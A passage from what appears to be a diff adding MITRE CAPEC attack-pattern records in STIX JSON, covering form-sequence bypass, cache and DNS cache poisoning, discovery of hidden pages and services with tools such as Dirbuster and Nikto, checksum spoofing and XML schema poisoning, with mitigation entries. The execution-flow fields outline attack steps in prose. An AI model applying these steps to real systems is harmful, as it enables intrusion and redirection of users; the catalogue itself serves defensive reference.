}, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Some web applications require users to submit information through an ordered sequence of web forms. This is often done if there is a very large amount of information being collected or if information on earlier forms is used to pre-populate fields or determine which additional information the application needs to collect. An attacker who knows the names of the various forms in the sequence may be able to explicitly type in the name of a later form and navigate to it without first going through the previous forms. This can result in incomplete collection of information, incorrect assumptions about the information submitted by the attacker, or other problems that can impair the functioning of the application.", + "external_references": [ + { + "external_id": "CAPEC-140", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/140.html" + }, + { + "external_id": "CWE-372", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/372.html" + } + ], + "id": "attack-pattern--750dc5a2-e3c4-42d7-ad8a-25a7d1116f03", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Bypassing of Intermediate Forms in Multiple-Form Sets", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--649abc91-f615-4c9e-91c9-9e66131e2d78" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The target must collect information from the user in a series of forms where each form has its own URL that the attacker can anticipate and the application must fail to detect attempts to access intermediate forms without first filling out the previous forms." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker exploits the functionality of cache technologies to cause specific data to be cached that aids the attackers' objectives. This describes any attack whereby an attacker places incorrect or harmful material in cache. The targeted cache can be an application's cache (e.g. a web browser cache) or a public cache (e.g. a DNS or ARP cache). Until the cache is refreshed, most applications or clients will treat the corrupted cache value as valid. This can lead to a wide range of exploits including redirecting web browsers towards sites that install malware and repeatedly incorrect calculations based on the incorrect value.", + "external_references": [ + { + "external_id": "CAPEC-141", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/141.html" + }, + { + "external_id": "CWE-348", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/348.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "external_id": "CWE-349", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/349.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "description": "Adversary-in-the-Middle: ARP Cache Poisoning", + "external_id": "T1557.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1557/002" + }, + { + "description": "Cache Poisoning", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Cache_Poisoning" + }, + { + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "external_id": "REF-22", + "source_name": "reference_from_CAPEC", + "url": "http://en.wikipedia.org/wiki/DNS_cache_poisoning" + }, + { + "description": "DNS Threats and DNS Weaknesses, DNSSEC", + "external_id": "REF-23", + "source_name": "reference_from_CAPEC", + "url": "http://www.dnssec.net/dns-threats.php" + }, + { + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "external_id": "REF-24", + "source_name": "reference_from_CAPEC", + "url": "http://en.wikipedia.org/wiki/ARP_spoofing" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-599", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/04-Authentication_Testing/06-Testing_for_Browser_Cache_Weaknesses.html" + } + ], + "id": "attack-pattern--e244a53a-8c69-462c-8ff2-900a839d48cb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Cache Poisoning", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "attack-pattern--ae3f2c33-9018-442e-9cc3-24d65c7f4974", + "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681" + ], + "x_capec_child_of_refs": [ + "attack-pattern--2a6131f7-30af-4529-be4e-bc3b7bf22009" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n In this example, an attacker sends request to a local DNS server to look up www.example .com. The associated IP address of www.example.com is 1.3.5.7.\n Local DNS usually caches IP addresses and do not go to remote DNS every time. Since the local record is not found, DNS server tries to connect to remote DNS for queries. However, before the remote DNS returns the right IP address 1.3.5.7, the attacker floods local DNS with crafted responses with IP address 2.4.6.8. The result is that 2.4.6.8 is stored in DNS cache. Meanwhile, 2.4.6.8 is associated with a malicious website www.maliciousexampsle.com\n When users connect to www.example.com, the local DNS will direct it to www.maliciousexample.com, this works as part of a Pharming attack.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify and explore caches: Use tools to sniff traffic and scan a network in order to locate application's cache (e.g. a web browser cache) or a public cache (e.g. a DNS or ARP cache) that may have vulnerabilities. Look for poisoning point in cache table entries.

    2. Techniques
    Run tools that check available entries in the cache.

Experiment

  1. Cause specific data to be cached: An attacker sends bogus request to the target, and then floods responses that trick a cache to remember malicious responses, which are wrong answers of queries.

    2. Techniques
    Intercept or modify a query, or send a bogus query with known credentials (such as transaction ID).

Exploit

  1. Redirect users to malicious website: As the attacker succeeds in exploiting the vulnerability, they are able to manipulate and interpose malicious response data to targeted victim queries.

    2. Techniques
    Intercept or modify a query, or send a bogus query with known credentials (such as transaction ID).
    Adversary-in-the-Middle attacks (CAPEC-94) intercept secure communication between two parties.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--ee604341-eb03-4b00-8188-26d6e999d6dc" + ], + "x_capec_prerequisites": [ + "The attacker must be able to modify the value stored in a cache to match a desired value.", + "The targeted application must not be able to detect the illicit modification of the cache and must trust the cache value in its calculations." + ], + "x_capec_skills_required": { + "Medium": "To overwrite/modify targeted cache" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Disable client side caching.", + "id": "course-of-action--b3bb35f0-3493-4d4b-bdb9-7d820a64f6e7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-141-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--deba223b-a821-4baf-b653-5358be0f03c4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b3bb35f0-3493-4d4b-bdb9-7d820a64f6e7", + "spec_version": "2.1", + "target_ref": "attack-pattern--e244a53a-8c69-462c-8ff2-900a839d48cb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Listens for query replies on a network, and sends a notification via email when an entry changes.", + "id": "course-of-action--f60e0fe1-d821-4df9-817e-4d2a91308464", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-141-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2f3dd06d-6976-4324-8d3c-1523b5d6f23a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f60e0fe1-d821-4df9-817e-4d2a91308464", + "spec_version": "2.1", + "target_ref": "attack-pattern--e244a53a-8c69-462c-8ff2-900a839d48cb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "A domain name server translates a domain name (such as www.example.com) into an IP address that Internet hosts use to contact Internet resources. An adversary modifies a public DNS cache to cause certain names to resolve to incorrect addresses that the adversary specifies. The result is that client applications that rely upon the targeted cache for domain name resolution will be directed not to the actual address of the specified domain name but to some other address. Adversaries can use this to herd clients to sites that install malware on the victim's computer or to masquerade as part of a Pharming attack.", + "external_references": [ + { + "external_id": "CAPEC-142", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/142.html" + }, + { + "external_id": "CWE-348", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/348.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "external_id": "CWE-349", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/349.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-350", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/350.html" + }, + { + "description": "Compromise Infrastructure: DNS Server", + "external_id": "T1584.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1584/002" + }, + { + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "external_id": "REF-22", + "source_name": "reference_from_CAPEC", + "url": "http://en.wikipedia.org/wiki/DNS_cache_poisoning" + }, + { + "description": "DNS Threats and DNS Weaknesses, DNSSEC", + "external_id": "REF-23", + "source_name": "reference_from_CAPEC", + "url": "http://www.dnssec.net/dns-threats.php" + }, + { + "description": "Vulnerability Note VU#800113, 2008--07---08, US CERT", + "external_id": "REF-27", + "source_name": "reference_from_CAPEC", + "url": "http://www.kb.cert.org/vuls/id/800113#pat" + } + ], + "id": "attack-pattern--ee604341-eb03-4b00-8188-26d6e999d6dc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "DNS Cache Poisoning", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285" + ], + "x_capec_child_of_refs": [ + "attack-pattern--e244a53a-8c69-462c-8ff2-900a839d48cb" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n In this example, an adversary sends request to a local DNS server to look up www.example .com. The associated IP address of www.example.com is 1.3.5.7.\n Local DNS usually caches IP addresses and do not go to remote DNS every time. Since the local record is not found, DNS server tries to connect to remote DNS for queries. However, before the remote DNS returns the right IP address 1.3.5.7, the adversary floods local DNS with crafted responses with IP address 2.4.6.8. The result is that 2.4.6.8 is stored in DNS cache. Meanwhile, 2.4.6.8 is associated with a malicious website www.maliciousexampsle.com\n When users connect to www.example.com, the local DNS will direct it to www.maliciousexample.com, this works as part of a Pharming attack.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Explore resolver caches: Check DNS caches on local DNS server and client's browser with DNS cache enabled.

    2. Techniques
    Run tools that check the resolver cache in the memory to see if it contains a target DNS entry.
    Figure out if the client's browser has DNS cache enabled.

Experiment

  1. Attempt sending crafted records to DNS cache: A request is sent to the authoritative server for target website and wait for the iterative name resolver. An adversary sends bogus request to the DNS local server, and then floods responses that trick a DNS cache to remember malicious responses, which are wrong answers of DNS query.

    2. Techniques
    Adversary must know the transaction ID by intercepting a DNS query, or sending a bogus query with known transaction ID.
    If the transaction ID used to identify each query instance is randomized in some new DNS software, the attack must guess the transaction ID. Slow the response of the real DNS server by causing Denial-of-service. This gives adversaries enough time to guess transaction
    Adversary crafts DNS response with the same transaction ID as in the request. The adversary sends out DNS responses before the authorized DNS server. This forces DNS local cache stores fake DNS response (wrong answer). The fake DNS responses usually include a malicious website's IP address.

Exploit

  1. Redirect users to malicious website: As the adversary succeeds in exploiting the vulnerability, the victim connects to a malicious site using a good web site's domain name.

    2. Techniques
    Redirecting Web traffic to a site that looks enough like the original so as to not raise any suspicion.
    Adversary-in-the-Middle (CAPEC-94) intercepts secure communication between two parties.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "A DNS cache must be vulnerable to some attack that allows the adversary to replace addresses in its lookup table.Client applications must trust the corrupted cashed values and utilize them for their domain name resolutions." + ], + "x_capec_resources_required": [ + "The adversary must have the resources to modify the targeted cache. In addition, in most cases the adversary will wish to host the sites to which users will be redirected, although in some cases redirecting to a third party site will accomplish the adversary's goals." + ], + "x_capec_skills_required": { + "Medium": "To overwrite/modify targeted DNS cache" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Make sure your DNS servers have been updated to the latest versions", + "id": "course-of-action--1643a615-4b7c-4a23-a477-7d01dbf9fe9d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-142-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8b310b70-cd48-479c-a4a6-1e9a513c96ea", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1643a615-4b7c-4a23-a477-7d01dbf9fe9d", + "spec_version": "2.1", + "target_ref": "attack-pattern--ee604341-eb03-4b00-8188-26d6e999d6dc", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: UNIX services like rlogin, rsh/rcp, xhost, and nfs are all susceptible to wrong information being held in a cache. Care should be taken with these services so they do not rely upon DNS caches that have been exposed to the Internet.", + "id": "course-of-action--d2e06ab9-42c0-4da5-93f2-f6200862bebc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-142-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d75a59b5-0380-4139-9922-641a68593944", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d2e06ab9-42c0-4da5-93f2-f6200862bebc", + "spec_version": "2.1", + "target_ref": "attack-pattern--ee604341-eb03-4b00-8188-26d6e999d6dc", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Disable client side DNS caching.", + "id": "course-of-action--7e7fd1bf-64be-4c80-a438-60deb39ef6cf", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-142-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f3632005-d0b9-4ed4-b5c5-337170c60644", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7e7fd1bf-64be-4c80-a438-60deb39ef6cf", + "spec_version": "2.1", + "target_ref": "attack-pattern--ee604341-eb03-4b00-8188-26d6e999d6dc", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary searches a targeted web site for web pages that have not been publicized. In doing this, the adversary may be able to gain access to information that the targeted site did not intend to make public.", + "external_references": [ + { + "external_id": "CAPEC-143", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/143.html" + }, + { + "external_id": "CWE-425", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/425.html" + } + ], + "id": "attack-pattern--a20a3cc9-4a6a-4376-a2b4-777ee9df2a34", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Detect Unpublicized Web Pages", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--797f4b4e-371a-4d06-9e98-5cccb8a7ebc1" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find target web site: An adversary finds a target web site that they think may have unpublicized web pages

  2. Map the published web site: The adversary will map the published web site either by using an automated tool or by manually accessing well-known debugging or logging pages, or otherwise predictable pages within the site tree

    3. Techniques
    Use Dirbuster to brute force directories and file names to find unpublicized pages
    Find a pattern in the naming of documents and extrapolate this pattern to discover additional documents that have been created but are no longer externally linked

Experiment

  1. Try to find weaknesses or information: The adversary will try to find weaknesses or information on the unpublicized pages that the targeted site did not intend to be public

    2. Techniques
    Manually analyze files or pages for information that could be useful in a further attack
    Use a static analysis tool to find weaknesses in unpublished web pages

Exploit

  1. Follow-up attack: Use any information or weaknesses found to carry out a follow-up attack

", + "x_capec_prerequisites": [ + "The targeted web site must include pages within its published tree that are not connected to its tree of links. The sensitivity of the content of these pages determines the severity of this attack." + ], + "x_capec_resources_required": [ + "Spidering tools to explore the target web site are extremely useful in this attack especially when attacking large sites. Some tools might also be able to automatically construct common page locations from known paths." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary searches a targeted web site for web services that have not been publicized. This attack can be especially dangerous since unpublished but available services may not have adequate security controls placed upon them given that an administrator may believe they are unreachable.", + "external_references": [ + { + "external_id": "CAPEC-144", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/144.html" + }, + { + "external_id": "CWE-425", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/425.html" + } + ], + "id": "attack-pattern--af65cbd9-cc10-4c4f-9cc3-843941cdf357", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Detect Unpublicized Web Services", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--797f4b4e-371a-4d06-9e98-5cccb8a7ebc1" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find target web site: An adversary finds a target web site that they think may have unpublicized web services

  2. Map the published web site: The adversary will map the published web site either by using an automated tool or by manually accessing well-known debugging or logging pages, or otherwise predictable pages within the site tree

    3. Techniques
    Use Dirbuster to brute force directories and file names to find unpublicized web services
    Find a pattern in the naming of documents and extrapolate this pattern to discover additional documents that have been created but are no longer externally linked

Experiment

  1. Try to find weaknesses or information: The adversary will try to find weaknesses in the unpublicized services that the targeted site did not intend to be public

    2. Techniques
    Use Nikto to look for web service vulnerabilities

Exploit

  1. Follow-up attack: Use any information or weaknesses found to carry out a follow-up attack

", + "x_capec_prerequisites": [ + "The targeted web site must include unpublished services within its web tree. The nature of these services determines the severity of this attack." + ], + "x_capec_resources_required": [ + "Spidering tools to explore the target web site are extremely useful in this attack especially when attacking large sites. Some tools might also be able to automatically construct common service queries from known paths." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary spoofs a checksum message for the purpose of making a payload appear to have a valid corresponding checksum. Checksums are used to verify message integrity. They consist of some value based on the value of the message they are protecting. Hash codes are a common checksum mechanism. Both the sender and recipient are able to compute the checksum based on the contents of the message. If the message contents change between the sender and recipient, the sender and recipient will compute different checksum values. Since the sender's checksum value is transmitted with the message, the recipient would know that a modification occurred. In checksum spoofing an adversary modifies the message body and then modifies the corresponding checksum so that the recipient's checksum calculation will match the checksum (created by the adversary) in the message. This would prevent the recipient from realizing that a change occurred.", + "external_references": [ + { + "external_id": "CAPEC-145", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/145.html" + }, + { + "external_id": "CWE-354", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/354.html" + } + ], + "id": "attack-pattern--9d8a9dc3-5115-43c3-a5ec-8003e7b97b2e", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Checksum Spoofing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The adversary must be able to intercept a message from the sender (keeping the recipient from getting it), modify it, and send the modified message to the recipient.", + "The sender and recipient must use a checksum to protect the integrity of their message and transmit this checksum in a manner where the adversary can intercept and modify it.", + "The checksum value must be computable using information known to the adversary. A cryptographic checksum, which uses a key known only to the sender and recipient, would thwart this attack." + ], + "x_capec_resources_required": [ + "The adversary must have a utility that can intercept and modify messages between the sender and recipient." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary corrupts or modifies the content of XML schema information passed between a client and server for the purpose of undermining the security of the target. XML Schemas provide the structure and content definitions for XML documents. Schema poisoning is the ability to manipulate a schema either by replacing or modifying it to compromise the programs that process documents that use this schema.", + "external_references": [ + { + "external_id": "CAPEC-146", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/146.html" + }, + { + "external_id": "CWE-15", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/15.html" + }, + { + "external_id": "CWE-472", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/472.html" + } + ], + "id": "attack-pattern--ebf4bdc7-73dd-47c4-96e1-1ff471efbcd2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "XML Schema Poisoning", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--41cfbb50-1b96-4004-a42e-6e8d21dd6f87" + ], + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution (A successful schema poisoning attack can compromise the availability of the target system's service by exhausting its available resources.)", + "Resource Consumption (A successful schema poisoning attack can compromise the availability of the target system's service by exhausting its available resources.)" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n XML Schema Poisoning Attacks can often occur locally due to being embedded within the XML document itself or being located on the host within an improperaly protected file. In these cases, the adversary can simply edit the XML schema without the need for additional privileges. An example of the former can be seen below:\n ]> John Smith 555-1234 jsmith@email.com
1 Example Lane
\n If the 'name' attribute is required in all submitted documents and this field is removed by the adversary, the application may enter an unexpected state or record incomplete data. Additionally, if this data is needed to perform additional functions, a Denial of Service (DOS) may occur.\n ", + "\n XML Schema Poisoning Attacks can also be executed remotely if the HTTP protocol is being used to transport data. :\n John Smith 555-1234 jsmith@email.com
1 Example Lane
\n The HTTP protocol does not encrypt the traffic it transports, so all communication occurs in plaintext. This traffic can be observed and modified by the adversary during transit to alter the XML schema before it reaches the end user. The adversary can perform a Adversary-in-the-Middle (CAPEC-94) Attack to alter the schema in the same way as the previous example and to acheive the same results.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine if XML schema is local or remote: Because this attack differs slightly if the target uses remote XML schemas versus local schemas, the adversary first needs to determine which of the two are used.

Experiment

  1. Gain access to XML schema: The adversary gains access to the XML schema so that they can modify the contents.

    2. Techniques
    For a local scenario, the adversary needs access to the machine that the schema is located on and needs to gain permissions to alter the contents of the file.
    For a remote scenario, the adversary needs to be able to sniff HTTP traffic that contains an XML schema.

Exploit

  1. Poison XML schema: Once the adversary gains access to the XML schema, they will alter it to achieve a desired effect. Locally, they can simply modify the file. For remote schemas, the adversary will alter the schema in transit by performing an adversary in the middle attack.

    2. Techniques
    Cause a denial of service by modifying the schema so that it does not contain required information for subsequent processing. For example, the unaltered schema may require a @name attribute in all submitted documents. If the adversary removes this attribute from the schema then documents created using the new grammar may lack this field, which may cause the processing application to enter an unexpected state or record incomplete data.
    Manipulation of the data types described in the schema may affect the results of calculations. For example, a float field could be changed to an int field.
    Change the encoding defined in the schema for certain fields allowing the contents to bypass filters that scan for dangerous strings. For example, the modified schema might use a URL encoding instead of ASCII, and a filter that catches a semicolon (;) might fail to detect its URL encoding (%3B).
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Some level of access to modify the target schema.", + "The schema used by the target application must be improperly secured against unauthorized modification and manipulation." + ], + "x_capec_resources_required": [ + "Access to the schema and the knowledge and ability modify it. Ability to replace or redirect access to the modified schema." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Protect the schema against unauthorized modification.", + "id": "course-of-action--c36e13c8-5f07-493b-9093-bc3656142e52", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-146-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--aa8c2087-a10b-40c8-aa4d-00be4324dda2", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c36e13c8-5f07-493b-9093-bc3656142e52", + "spec_version": "2.1", + "target_ref": "attack-pattern--ebf4bdc7-73dd-47c4-96e1-1ff471efbcd2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: For applications that use a known schema, use a local copy or a known good repository instead of the schema reference supplied in the XML document. Additionally, ensure that the proper permissions are set on local files to avoid unauthorized modification.", + "id": "course-of-action--bdd2a92c-5b73-40d3-ad60-b046cf2aa3de", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-146-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8075cef3-6e2d-40ac-9e91-b9a4e17b5460", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bdd2a92c-5b73-40d3-ad60-b046cf2aa3de", + "spec_version": "2.1", + "target_ref": "attack-pattern--ebf4bdc7-73dd-47c4-96e1-1ff471efbcd2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": 